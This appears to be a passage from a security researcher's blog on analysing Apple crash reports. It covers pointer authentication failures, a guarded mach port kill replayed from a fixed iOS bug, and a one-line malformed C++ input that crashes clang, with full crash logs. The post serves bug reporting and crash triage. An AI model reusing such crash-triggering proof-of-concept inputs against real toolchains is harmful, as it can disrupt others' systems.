0x1d2156000 - 0x1d215ffff libsystem_darwin.dylib arm64e  <63485fa6fe9235b783a00554e0194eba> /usr/lib/system/libsystem_darwin.dylib
0x1d2160000 - 0x1d2168fff libsystem_dnssd.dylib arm64e  <591126c3ffdb3df8afb3cb5f5c3e79a0> /usr/lib/system/libsystem_dnssd.dylib
0x1d2169000 - 0x1d216bfff libsystem_featureflags.dylib arm64e  <a5ca1f870aef3eee876e0c077d7638ee> /usr/lib/system/libsystem_featureflags.dylib
0x1d216c000 - 0x1d2199fff libsystem_m.dylib arm64e  <c9e29eee8f90377795c625952802e491> /usr/lib/system/libsystem_m.dylib
0x1d219a000 - 0x1d21a0fff libsystem_platform.dylib arm64e  <88fa2f54074d32c49f4879eb67e67b7b> /usr/lib/system/libsystem_platform.dylib
0x1d21a1000 - 0x1d21a1fff libsystem_product_info_filter.dylib arm64e  <563ac8a6230f305bbada77870fec6204> /usr/lib/system/libsystem_product_info_filter.dylib
0x1d21a2000 - 0x1d21adfff libsystem_pthread.dylib arm64e  <c939a2abd3b13b0a83c57ce2f4f339a9> /usr/lib/system/libsystem_pthread.dylib
0x1d21ae000 - 0x1d21b1fff libsystem_sandbox.dylib arm64e  <d7ea594452b73c8882c4726694052a14> /usr/lib/system/libsystem_sandbox.dylib
0x1d21b2000 - 0x1d21bcfff libunwind.dylib arm64e  <d08ac1cff13c37cf93066cc664058cf0> /usr/lib/system/libunwind.dylib
0x1d21bd000 - 0x1d21f3fff libxpc.dylib arm64e  <cc048c8e1cad36c88a9615966103bd3a> /usr/lib/system/libxpc.dylib
EOF

Root Cause Analysis of Crash #5

Classic Crash Analysis is that the Toybox Pointer, 0x6b726f7774656e50, points to outerspace beyond the commpage at 0x0000007774656e50, the upper bits of the Pointer are incorrect. The error message ‘possible pointer authentication failure’ is thrown resulting in EXC_BAD_ACCESS (SIGSEGV). Note 0x6b726f representing the invalid PAC.

This Crash fits into Case 1: invalid memory access. The Toybox Crash is due to an Invalid Memory Operation expressed as (Data Abort) byte read Translation fault. The Developers may also be calling a virtual method using a declaration that differs from its definition that will trigger a pointer authentication failure in arm64e.

ABI Issue

Crash #5 has a Process Name of Toybox. But sometimes things are not as they appear. The Error Message: possible pointer authentication failure is an ABI Issue according to the information I received that caused me to Close the Issue with Toybox.

Learning

This was the Reply from Elliot at Toybox [Google] that got me thinking: “id certainly works for me on macOS/x86-64, but i don’t have any ARM Apple devices so i can’t test PAC/BTI (if this is a PAC failure, though i don’t think it actually is, since i think that’s saying you’re dying in the strlen() prolog rather than the epilog)”.

Schooled

Then, in another comment from Elliot, I really began to see I was Filing a Bug Report with the wrong Project, here is the quote that schooled me: “that might be interesting to work out whether this is an iOS vs macOS issue rather than an arm64e issue. (like i said, macOS x86-64 id works for me, through thousands of runs. but i don’t have any iOS, nor macOS arm64.)”

Similar Exception Code

The Debugger, debugserver with remote lldb threw the similar Exception Code of possible pointer authentication failure, data abort, pointer traps for DA key signing errors and more. At that moment it became obvious that I was wasting the time of the Toybox Maintainers for which I apologized. My Bad for not having properly analyzed the Crash Report.

CPU interprets PAC Failures as memory corruption

The CPU interprets PAC Failures as memory corruption and sets a high-order bit in the Pointer, making the Pointer invalid and causing the Application to Crash as detailed here. My gut says there is a Compiler Bug and/or c++ memory Bug too.

Crash #6 – Fixed Exploit

This Crash is a Replay PoC from a Bug that has been Fixed by Apple. I thought it is worth showing when a EXC_GUARD (SIGKILL) is seen in a Crash Report.

Hardware Model:      iPhone12,1
Process:             cx.xss.poc-tap-mach-port-001 [435]
Path:                /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.5WZPyG/usr/bin/cx.xss.poc-tap-mach-port-001
Identifier:          cx.xss.poc-tap-mach-port-001
Version:             ???
Code Type:           ARM-64 (Native)
Role:                Unspecified
Parent Process:      sh [420]
Coalition:           com.example.cryptex.sshd [547]
Date/Time:           2021-10-06 18:54:23.9961 -0400
Launch Time:         2021-10-06 18:54:23.9754 -0400
OS Version:          iPhone OS 15.1 (19B5060d)
Release Type:        Beta
Baseband Version:    3.00.00
Report Version:      104
Exception Type:  EXC_GUARD (SIGKILL)
Exception Subtype: GUARD_TYPE_MACH_PORT
Exception Message:  ILLEGAL_MOVE on mach port 515 (guarded with 0x0000000000000000)
Exception Codes: 0x0000000000000203, 0x0000000000000000
Exception Note:  EXC_CORPSE_NOTIFY
Termination Reason: GUARD; [2305843146652647939]
Triggered by Thread:  1
Thread 0 name:   Dispatch queue: com.apple.main-thread
Thread 0:
0   cx.xss.poc-tap-mach-port-001           	       0x100215298 main + 740
1   cx.xss.poc-tap-mach-port-001           	       0x10021528c main + 728
2   dyld                          	       0x100411a24 start + 520
Thread 1 Crashed:
0   libsystem_kernel.dylib        	       0x1b7846504 mach_msg_trap + 8
1   libsystem_kernel.dylib        	       0x1b7846b9c mach_msg + 76
2   cx.xss.poc-tap-mach-port-001           0x100215cfc tap_mach_port + 432
3   libsystem_pthread.dylib       	       0x1f0c8a9a4 _pthread_start + 148
4   libsystem_pthread.dylib       	       0x1f0c89ea0 thread_start + 8
Thread 1 crashed with ARM Thread State (64-bit):
    x0: 0x000000001000000a   x1: 0x0000000000000001   x2: 0x000000000000002c   x3: 0x0000000000000000
    x4: 0x0000000000000000   x5: 0x0000000000000000   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x00000000fffffbbf   x9: 0x0000000000010680  x10: 0x0000000000000000  x11: 0x0000000000000000
   x12: 0x0000000000000000  x13: 0x0000000000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
   x16: 0xffffffffffffffe1  x17: 0x0000000100218080  x18: 0x0000000000000000  x19: 0x0000000000000000
   x20: 0x0000000000000000  x21: 0x0000000000000000  x22: 0x0000000000000000  x23: 0x000000016fc66930
   x24: 0x0000000000000001  x25: 0x000000000000002c  x26: 0x0000000000000001  x27: 0x0000000000000000
   x28: 0x0000000000000000   fp: 0x000000016fc668f0   lr: 0x00000001b7846b9c
    sp: 0x000000016fc668a0   pc: 0x00000001b7846504 cpsr: 0x60000000
   far: 0x000000016fc70000  esr: 0x56000080  Address size fault
Binary Images:
       0x100210000 -        0x100217fff cx.xss.poc-tap-mach-port-001 arm64e  <06a5e10efa46350581b3a5395757c567> /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.5WZPyG/usr/bin/cx.xss.poc-tap-mach-port-001
       0x1003f8000 -        0x10044ffff dyld arm64e  <13216777f4be3a7bb470857e80ad3300> /usr/lib/dyld
       0x1b7845000 -        0x1b7878fff libsystem_kernel.dylib arm64e  <3e34d3ba781e3337a7220a7afc3acd7b> /usr/lib/system/libsystem_kernel.dylib
       0x1f0c89000 -        0x1f0c94fff libsystem_pthread.dylib arm64e  <9f8c2a4cc7e83932821480ccd53f2812> /usr/lib/system/libsystem_pthread.dylib
EOF

Root Cause Analysis of Crash #6

Classic Crash Analysis is that the Termination Reason: GUARD is obvious. The Kernel sees that the Application has attempted an ILLEGAL_MOVE in a mach port that is guarded and executes a SIGKILL. Apple has more info in guarded_test_framework.c.

Crash #7 clang compiler

FB9684776 | This is a Crash that Targets clang-1300.0.29.3. PoC for M1 & X86_64. Note that the arm64e slice Exception Code is (possible pointer authentication failure) and on X86_64 the Exception Code is EXC_I386_GPFLT for the same PoC. I initially Reported this to Feedback Aug 29, 2015 at 10:20 PM as FB5807939 that Apple chose not to Fix.

PoC

echo 'lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*'  | clang -x c++ -c -

Result

clang: error: unable to execute command: Segmentation fault: 11
clang: error: clang frontend command failed due to signal (use -v to see invocation)
Apple clang version 13.0.0 (clang-1300.0.29.3)
M1 ARM Crash Report for Pointer Authentication Failure

Here is the Crash Report containing the M1 ARM Exception Code: possible pointer authentication failure as shown below:

Process:               clang [41744]
Path:                  /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/clang
Identifier:            clang
Version:               13.0.0 (1300.0.29)
Code Type:             ARM-64 (Native)
Parent Process:        ??? [41743]
Responsible:           iTerm2 [597]
User ID:               501
Date/Time:             2021-10-07 08:38:55.952 -0400
OS Version:            macOS 11.6 (20G165)
Report Version:        12
System Integrity Protection: disabled
Crashed Thread:        0  Dispatch queue: com.apple.main-thread
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x8000000000000000 -> 0x0000000000000000 (possible pointer authentication failure)
Exception Note:        EXC_CORPSE_NOTIFY
Termination Signal:    Segmentation fault: 11
Termination Reason:    Namespace SIGNAL, Code 0xb
Terminating Process:   exc handler [41744]
VM Regions Near 0:
--> 
    __TEXT                      104960000-108420000    [ 58.8M] r-x/r-x SM=COW  /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/clang
Application Specific Information:
dyld2 mode
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   clang                         	0x0000000106a4decc clang::TokenLexer::Lex(clang::Token&) + 248
1   clang                         	0x0000000106a4de88 clang::TokenLexer::Lex(clang::Token&) + 180
2   clang                         	0x0000000106a4aae4 clang::Preprocessor::Lex(clang::Token&) + 104
3   clang                         	0x0000000106a2a5b0 clang::Preprocessor::CachingLex(clang::Token&) + 164
4   clang                         	0x0000000106a4ab0c clang::Preprocessor::Lex(clang::Token&) + 144
5   clang                         	0x00000001062375f0 clang::Parser::ConsumeAnyToken(bool) + 160
6   clang                         	0x00000001062388f8 clang::Parser::SkipUntil(llvm::ArrayRef<clang::tok::TokenKind>, clang::Parser::SkipUntilFlags) + 716
7   clang                         	0x0000000107532628 clang::BalancedDelimiterTracker::diagnoseMissingClose() + 404
8   clang                         	0x000000010623daa0 clang::BalancedDelimiterTracker::consumeClose() + 480
9   clang                         	0x00000001061efde4 clang::Parser::ParsePostfixExpressionSuffix(clang::ActionResult<clang::Expr*, true>) + 2264
10  clang                         	0x00000001061f1320 clang::Parser::ParseCastExpression(clang::Parser::CastParseKind, bool, bool&, clang::Parser::TypeCastState, bool, bool*) + 196
11  clang                         	0x00000001061ef470 clang::Parser::ParseCastExpression(clang::Parser::CastParseKind, bool, clang::Parser::TypeCastState, bool, bool*) + 40
12  clang                         	0x00000001061ee7ac clang::Parser::ParseRHSOfBinaryExpression(clang::ActionResult<clang::Expr*, true>, clang::prec::Level) + 2356
13  clang                         	0x000000010620506c clang::Parser::ParseBraceInitializer() + 392
14  clang                         	0x00000001061d1de0 clang::Parser::ParseDeclarationAfterDeclaratorAndAttributes(clang::Declarator&, clang::Parser::ParsedTemplateInfo const&, clang::Parser::ForRangeInit*) + 4088
15  clang                         	0x00000001061cfe78 clang::Parser::ParseDeclGroup(clang::ParsingDeclSpec&, clang::DeclaratorContext, clang::SourceLocation*, clang::Parser::ForRangeInit*) + 1268
16  clang                         	0x000000010623b8d0 clang::Parser::ParseDeclOrFunctionDefInternal(clang::Parser::ParsedAttributesWithRange&, clang::ParsingDeclSpec&, clang::AccessSpecifier) + 264
17  clang                         	0x000000010623b448 clang::Parser::ParseDeclarationOrFunctionDefinition(clang::Parser::ParsedAttributesWithRange&, clang::ParsingDeclSpec*, clang::AccessSpecifier) + 200
18  clang                         	0x000000010623a9ac clang::Parser::ParseExternalDeclaration(clang::Parser::ParsedAttributesWithRange&, clang::ParsingDeclSpec*) + 2280
19  clang                         	0x0000000106239e48 clang::Parser::ParseTopLevelDecl(clang::OpaquePtr<clang::DeclGroupRef>&, bool) + 948
20  clang                         	0x00000001061bd8bc clang::ParseAST(clang::Sema&, bool, bool) + 308
21  clang                         	0x000000010591c77c clang::FrontendAction::Execute() + 60
22  clang                         	0x00000001058d20cc clang::CompilerInstance::ExecuteAction(clang::FrontendAction&) + 1300
23  clang                         	0x0000000105964b60 clang::ExecuteCompilerInvocation(clang::CompilerInstance*) + 1212
24  clang                         	0x00000001049669a8 cc1_main(llvm::ArrayRef<char const*>, char const*, void*) + 1424
25  clang                         	0x00000001049655b0 ExecuteCC1Tool(llvm::SmallVectorImpl<char const*>&) + 692
26  clang                         	0x00000001049652f4 driver_main(int, char const**) + 4056
27  clang                         	0x00000001049642fc main + 108
28  libdyld.dylib                 	0x0000000180a1d430 start + 4
Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000000000000   x1: 0x00000001418dc810   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x000000014162cd24   x5: 0x0000000000000009   x6: 0x0000000000000000   x7: 0x000000016b499b88
    x8: 0x0000000000000026   x9: 0x0000000000000000  x10: 0x0000000000000005  x11: 0x000000000000003e
   x12: 0x0000000141600000  x13: 0x000000002a2add88  x14: 0x000000002a2add28  x15: 0x00000000000060d0
   x16: 0x00000000000060d0  x17: 0x00000000000010a0  x18: 0x0000000000000000  x19: 0x00000001418dc810
   x20: 0x000000014162cd00  x21: 0x8000000000000000  x22: 0x0000000000000008  x23: 0x0000000000000001
   x24: 0x00000001418dc810  x25: 0x0000000108171318  x26: 0x0000000000000018  x27: 0x0000000000000016
   x28: 0x000000000000003d   fp: 0x000000016b49a8f0   lr: 0x0000000106a4de88
    sp: 0x000000016b49a8b0   pc: 0x0000000106a4decc cpsr: 0x20000000
   far: 0x8000000000000000  esr: 0x92000006
Binary Images:
       0x104960000 -        0x10841ffff +clang (13.0.0 - 1300.0.29) <57441989-D0D0-38DD-AE1E-AFE9C95C6FFF> /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/clang
       0x10a1f8000 -        0x10a277fff  dyld (852.2) <38657979-1ABE-3C9A-BF64-EF3B746216AB> /usr/lib/dyld
       0x18075a000 -        0x18075bfff  libsystem_blocks.dylib (79) <BA713F79-1620-38B2-8717-79849B8E897E> /usr/lib/system/libsystem_blocks.dylib
       0x18075c000 -        0x180793fff  libxpc.dylib (2038.120.1) <0E990C5D-C4F7-304A-9714-4409647CC2EF> /usr/lib/system/libxpc.dylib
       0x180794000 -        0x1807abfff  libsystem_trace.dylib (1277.120.1) <7A6B4800-8D94-3091-AC78-2D6B97A9B496> /usr/lib/system/libsystem_trace.dylib
       0x1807ac000 -        0x18081ffff  libcorecrypto.dylib (1000.140.4) <FAF9B49D-2583-34EF-850B-047F050ED996> /usr/lib/system/libcorecrypto.dylib
       0x180820000 -        0x18084bfff  libsystem_malloc.dylib (317.140.5) <A454F3F2-7BC4-3808-A60F-F5F4BC55577F> /usr/lib/system/libsystem_malloc.dylib
       0x18084c000 -        0x180890fff  libdispatch.dylib (1271.120.2) <4EDD5F72-2296-3891-B2A1-6741DB6C05C9> /usr/lib/system/libdispatch.dylib
       0x180891000 -        0x1808cafff  libobjc.A.dylib (824) <252C93CC-2D39-3C15-87F6-1336658B2F49> /usr/lib/libobjc.A.dylib
       0x1808cb000 -        0x1808cdfff  libsystem_featureflags.dylib (28.60.1) <61A79E0B-1836-376D-AC24-171B40A9FAE7> /usr/lib/system/libsystem_featureflags.dylib
       0x1808ce000 -        0x18094ffff  libsystem_c.dylib (1439.141.1) <9B3C0AD0-1E0B-39D1-BE25-B97F8EA7E623> /usr/lib/system/libsystem_c.dylib
       0x180950000 -        0x1809abfff  libc++.1.dylib (905.6) <BED05B96-CCAE-365A-B3F5-F8D72F5E77E1> /usr/lib/libc++.1.dylib
       0x1809ac000 -        0x1809c3fff  libc++abi.dylib (905.6) <3C5176E2-CE48-312B-97F6-23D4E7AFA43F> /usr/lib/libc++abi.dylib
       0x1809c4000 -        0x1809f7fff  libsystem_kernel.dylib (7195.141.6) <FA7E835C-CB30-3D98-9331-30CE6584423D> /usr/lib/system/libsystem_kernel.dylib
       0x1809f8000 -        0x180a04fff  libsystem_pthread.dylib (454.120.2) <BDC1C5DA-9499-3580-9588-2928DE2440DD> /usr/lib/system/libsystem_pthread.dylib
       0x180a05000 -        0x180a46fff  libdyld.dylib (852.2) <BE0B539A-2EDF-3A99-9632-731C5928BBAC> /usr/lib/system/libdyld.dylib
       0x180a47000 -        0x180a4dfff  libsystem_platform.dylib (254.80.2) <2CC11FAD-1E31-3533-B1D8-9CDDF5DFE595> /usr/lib/system/libsystem_platform.dylib
       0x180a4e000 -        0x180a79fff  libsystem_info.dylib (542.40.3) <3B5B9F97-ECFB-3F6E-9B85-D8C62A8B3205> /usr/lib/system/libsystem_info.dylib
       0x182e0f000 -        0x182e19fff  libsystem_darwin.dylib (1439.141.1) <9BF54A49-874D-3D91-B319-6B2F676FE42D> /usr/lib/system/libsystem_darwin.dylib
       0x183252000 -        0x18325dfff  libsystem_notify.dylib (279.40.4) <FA85C044-99A5-352D-B7AD-45FB31B295FF> /usr/lib/system/libsystem_notify.dylib
       0x185231000 -        0x185240fff  libsystem_networkextension.dylib (1295.140.3) <0FFACDE5-D546-306D-B9FA-06EC8FCAEEF9> /usr/lib/system/libsystem_networkextension.dylib
       0x185296000 -        0x1852adfff  libsystem_asl.dylib (385) <7F462B8A-541F-3195-9BAE-CDEDFA3BA8A4> /usr/lib/system/libsystem_asl.dylib
       0x186807000 -        0x18680efff  libsystem_symptoms.dylib (1431.140.1) <0B4FC817-CC87-31F2-872B-BD505D29F5EE> /usr/lib/system/libsystem_symptoms.dylib
       0x188663000 -        0x188674fff  libsystem_containermanager.dylib (318.100.4) <FCE2D8EA-A9D8-3A5D-A908-3E9C0AFFB941> /usr/lib/system/libsystem_containermanager.dylib
       0x1892e1000 -        0x1892e5fff  libsystem_configuration.dylib (1109.140.1) <9BC511C4-6613-3F1D-8592-7D3971B24921> /usr/lib/system/libsystem_configuration.dylib
       0x1892e6000 -        0x1892eafff  libsystem_sandbox.dylib (1441.141.4) <CABF63A0-DDAF-3A54-8447-1256DFFD2907> /usr/lib/system/libsystem_sandbox.dylib
       0x189ca7000 -        0x189ca9fff  libquarantine.dylib (119.40.2) <DE9BFFD7-62ED-38ED-BF58-388F192BE6FC> /usr/lib/system/libquarantine.dylib
       0x18a20a000 -        0x18a20efff  libsystem_coreservices.dylib (127.1) <F107780A-EFAD-3DC8-A62F-825DD954128E> /usr/lib/system/libsystem_coreservices.dylib
       0x18a3f4000 -        0x18a405fff  libz.1.dylib (76) <4838F5D2-C9BB-366A-9745-209A80BCC426> /usr/lib/libz.1.dylib
       0x18a406000 -        0x18a433fff  libsystem_m.dylib (3186.100.3) <092A6565-3BE3-3EEF-844E-B846793A4115> /usr/lib/system/libsystem_m.dylib
       0x18a435000 -        0x18a43afff  libmacho.dylib (980) <F6CBC87D-DC83-3E5F-A7C0-B0115E7D1BC1> /usr/lib/system/libmacho.dylib
       0x18a453000 -        0x18a460fff  libcommonCrypto.dylib (60178.120.3) <146E6A52-3060-32A1-9119-C3D6F8B5C57B> /usr/lib/system/libcommonCrypto.dylib
       0x18a461000 -        0x18a46bfff  libunwind.dylib (201) <2A01EF92-F92D-35F7-B638-8CBC6896DCAA> /usr/lib/system/libunwind.dylib
       0x18a46c000 -        0x18a473fff  liboah.dylib (203.58) <6802DEC1-9ED5-3667-BFE0-3BDDE8BB40E1> /usr/lib/liboah.dylib
       0x18a474000 -        0x18a47cfff  libcopyfile.dylib (173.40.2) <8477DD43-56AA-3422-BF23-4ADC7B98462F> /usr/lib/system/libcopyfile.dylib
       0x18a47d000 -        0x18a480fff  libcompiler_rt.dylib (102.2) <50E8F23E-3E63-31BF-BFC3-EE75D281B151> /usr/lib/system/libcompiler_rt.dylib
       0x18a481000 -        0x18a483fff  libsystem_collections.dylib (1439.141.1) <EA89016C-2C72-3531-84D9-2A696F2DAC85> /usr/lib/system/libsystem_collections.dylib
       0x18a484000 -        0x18a486fff  libsystem_secinit.dylib (87.60.1) <836B23E3-DF08-31C8-98AD-4A9B12A4B404> /usr/lib/system/libsystem_secinit.dylib
       0x18a487000 -        0x18a489fff  libremovefile.dylib (49.120.1) <687A6E36-0460-30BC-A675-7F83059AE2D9> /usr/lib/system/libremovefile.dylib
       0x18a48a000 -        0x18a48afff  libkeymgr.dylib (31) <C5D64EE9-AB76-3D4C-BC4F-2BE8415DC21A> /usr/lib/system/libkeymgr.dylib
       0x18a48b000 -        0x18a493fff  libsystem_dnssd.dylib (1310.140.1) <DEE0783F-DDC9-35A6-9F6E-6B8FE94FBF0A> /usr/lib/system/libsystem_dnssd.dylib
       0x18a494000 -        0x18a499fff  libcache.dylib (83) <2EA812B3-0565-35FA-BF54-DF98EF3DB5DE> /usr/lib/system/libcache.dylib
       0x18a49a000 -        0x18a49bfff  libSystem.B.dylib (1292.120.1) <1E75FCDF-2357-30FE-AAAD-5290BA722464> /usr/lib/libSystem.B.dylib
       0x18d8b9000 -        0x18d8b9fff  liblaunch.dylib (2038.120.1) <AA4E8477-1B82-357E-8275-FFED1F957AF9> /usr/lib/system/liblaunch.dylib
       0x18fd6d000 -        0x18fd6dfff  libsystem_product_info_filter.dylib (8.40.1) <14136F56-3690-3346-90A0-31FC34DF3E1B> /usr/lib/system/libsystem_product_info_filter.dylib
       0x1a048d000 -        0x1a04bdfff  libncurses.5.4.dylib (57) <0300C82B-7239-32FD-8A28-45A25D89EAAC> /usr/lib/libncurses.5.4.dylib
External Modification Summary:
  Calls made by other processes targeting this process:
    task_for_pid: 0
    thread_create: 0
    thread_set_state: 0
  Calls made by this process:
    task_for_pid: 0
    thread_create: 0
    thread_set_state: 0
  Calls made by all processes on this machine:
    task_for_pid: 5
    thread_create: 0
    thread_set_state: 14
VM Region Summary:
ReadOnly portion of Libraries: Total=577.7M resident=0K(0%) swapped_out_or_unallocated=577.7M(100%)
Writable regions: Total=282.7M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=282.7M(100%)
                                VIRTUAL   REGION 
REGION TYPE                        SIZE    COUNT (non-coalesced) 
===========                     =======  ======= 
Kernel Alloc Once                   32K        1 
MALLOC                            34.1M       12 
MALLOC guard page                   96K        5 
MALLOC_MEDIUM (reserved)         240.0M        2         reserved VM address space (unallocated)
STACK GUARD                       56.0M        1 
Stack                             8192K        2 
VM_ALLOCATE                        1.0G        1 
__AUTH                              45K       12 
__AUTH_CONST                        76K       40 
__DATA                             789K       40 
__DATA_CONST                      4446K       40 
__DATA_DIRTY                        73K       21 
__LINKEDIT                       514.2M        4 
__OBJC_CONST                        10K        5 
__OBJC_RO                         75.1M        1 
__OBJC_RW                         2576K        1 
__TEXT                            63.6M       46 
shared memory                       16K        1 
===========                     =======  ======= 
TOTAL                              2.0G      235 
TOTAL, minus reserved VM space     1.7G      235 
X86_64 Crash Report for EXC_I386_GPFLT
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       EXC_I386_GPFLT
Exception Note:        EXC_CORPSE_NOTIFY
Termination Signal:    Segmentation fault: 11
Termination Reason:    Namespace SIGNAL, Code 0xb
Terminating Process:   exc handler [38987]
Application Specific Information:
dyld2 mode
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   clang                         	0x000000011078fa3f clang::TokenLexer::Lex(clang::Token&) + 223
1   clang                         	0x000000011078c3f3 clang::Preprocessor::Lex(clang::Token&) + 83
2   clang                         	0x000000010fe1beff clang::Parser::ConsumeAnyToken(bool) + 95
3   clang                         	0x000000010fe1d4eb clang::Parser::SkipUntil(llvm::ArrayRef<clang::tok::TokenKind>, clang::Parser::SkipUntilFlags) + 795
4   clang                         	0x0000000111596362 clang::BalancedDelimiterTracker::diagnoseMissingClose() + 738
5   clang                         	0x000000010fe234f6 clang::BalancedDelimiterTracker::consumeClose() + 566
6   clang                         	0x000000010fdc96c4 clang::Parser::ParsePostfixExpressionSuffix(clang::ActionResult<clang::Expr*, true>) + 2628
7   clang                         	0x000000010fdcb186 clang::Parser::ParseCastExpression(clang::Parser::CastParseKind, bool, bool&, clang::Parser::TypeCastState, bool, bool*) + 198
8   clang                         	0x000000010fdc8bc9 clang::Parser::ParseCastExpression(clang::Parser::CastParseKind, bool, clang::Parser::TypeCastState, bool, bool*) + 41
9   clang                         	0x000000010fdc74dd clang::Parser::ParseRHSOfBinaryExpression(clang::ActionResult<clang::Expr*, true>, clang::prec::Level) + 3261
10  clang                         	0x000000010fde3837 clang::Parser::ParseBraceInitializer() + 391
11  clang                         	0x000000010fda4a22 clang::Parser::ParseDeclarationAfterDeclaratorAndAttributes(clang::Declarator&, clang::Parser::ParsedTemplateInfo const&, clang::Parser::ForRangeInit*) + 5602
12  clang                         	0x000000010fda1f6a clang::Parser::ParseDeclGroup(clang::ParsingDeclSpec&, clang::DeclaratorContext, clang::SourceLocation*, clang::Parser::ForRangeInit*) + 1482
13  clang                         	0x000000010fe20c9b clang::Parser::ParseDeclOrFunctionDefInternal(clang::Parser::ParsedAttributesWithRange&, clang::ParsingDeclSpec&, clang::AccessSpecifier) + 283
14  clang                         	0x000000010fe20854 clang::Parser::ParseDeclarationOrFunctionDefinition(clang::Parser::ParsedAttributesWithRange&, clang::ParsingDeclSpec*, clang::AccessSpecifier) + 244
15  clang                         	0x000000010fe1fb87 clang::Parser::ParseExternalDeclaration(clang::Parser::ParsedAttributesWithRange&, clang::ParsingDeclSpec*) + 3015
16  clang                         	0x000000010fe1ecee clang::Parser::ParseTopLevelDecl(clang::OpaquePtr<clang::DeclGroupRef>&, bool) + 1070
17  clang                         	0x000000010fd8caaf clang::ParseAST(clang::Sema&, bool, bool) + 351
18  clang                         	0x000000010f4494bd clang::FrontendAction::Execute() + 45
19  clang                         	0x000000010f3ef043 clang::CompilerInstance::ExecuteAction(clang::FrontendAction&) + 899
20  clang                         	0x000000010f496222 clang::ExecuteCompilerInvocation(clang::CompilerInstance*) + 1442
21  clang                         	0x000000010e2d3ba5 cc1_main(llvm::ArrayRef<char const*>, char const*, void*) + 1653
22  clang                         	0x000000010e2d2a3e ExecuteCC1Tool(llvm::SmallVectorImpl<char const*>&) + 670
23  clang                         	0x000000010e2d278d driver_main(int, char const**) + 4397
24  clang                         	0x000000010e2d163e main + 126
25  libdyld.dylib                 	0x00007fff20473f3d start + 1
Thread 0 crashed with X86 Thread State (64-bit):
  rax: 0x000000002e517362  rbx: 0x6874656e696c6b61  rcx: 0x00007fa8b4704630  rdx: 0x0000000000000000
  rdi: 0x0000000000007205  rsi: 0x00007fa8b5018001  rbp: 0x00007ffee192bff0  rsp: 0x00007ffee192bfc0
   r8: 0x0000000000001eb4   r9: 0x00007fa8b441db80  r10: 0x00007fa8b4400000  r11: 0x0000000000000000
  r12: 0x00000000b5018001  r13: 0x000000000000000d  r14: 0x00007fa8b5018010  r15: 0x00007fa8b47049d0
  rip: 0x000000011078fa3f  rfl: 0x0000000000010202  cr2: 0x0000000110cc8450
Logical CPU:     0
Error Code:      0x00000000
Trap Number:     13

Root Cause Analysis of Crash #7

If you have read this far, you probably know the Issue: Unsafe Handling of User Controllable Input [UCI] that results in memory corruption on both slices arm64e and X86_64.

arm64e

The Developers may also be calling a virtual method using a declaration that differs from its definition that will trigger a pointer authentication failure in arm64e.

CPU interprets PAC Failures as memory corruption

The CPU interprets PAC Failures as memory corruption and sets a high-order bit in the Pointer, making the Pointer invalid and causing the Application to Crash as detailed here. My gut says there is a Compiler Bug and/or c++ memory Bug too.

X86_64 General Protection Fault

The General Protection Fault on X86_64 Platforms is expressed in a Crash Report as Exception Code: EXC_I386_GPFLT. Generally this is a memory corruption for code or data.

AST Representation

Drilling down for those interested in the AST Representation for this Clang Crash, let me break this into the PoC command line generating the output, then the Clang compiler Errors then ending with the ast-dump for M1 arm64e & X86_64 slices.

PoC Command Line for Crash #7
%
echo 'lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*'  | clang -Xclang -ast-dump -fsyntax-only -x c++ -c -
Clang Compiler Errors – M1 arm64e slice
<stdin>:1:1: error: unknown type name 'lshort'; did you mean 'short'?
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
^~~~~~
short
<stdin>:1:29: error: invalid suffix 'LbreaklinethisQ' on integer constant
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                            ^
<stdin>:1:85: error: expected ';' after struct
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
                                                                                    ;
<stdin>:1:69: error: '(anonymous struct at <stdin>:1:69)' cannot be defined in a parameter type
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                    ^
<stdin>:1:85: error: expected ')'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
<stdin>:1:68: note: to match this '('
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                   ^
<stdin>:1:85: error: expected ')'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
<stdin>:1:61: note: to match this '('
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                            ^
<stdin>:1:45: error: use of undeclared identifier 'namespaceifndef'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                            ^
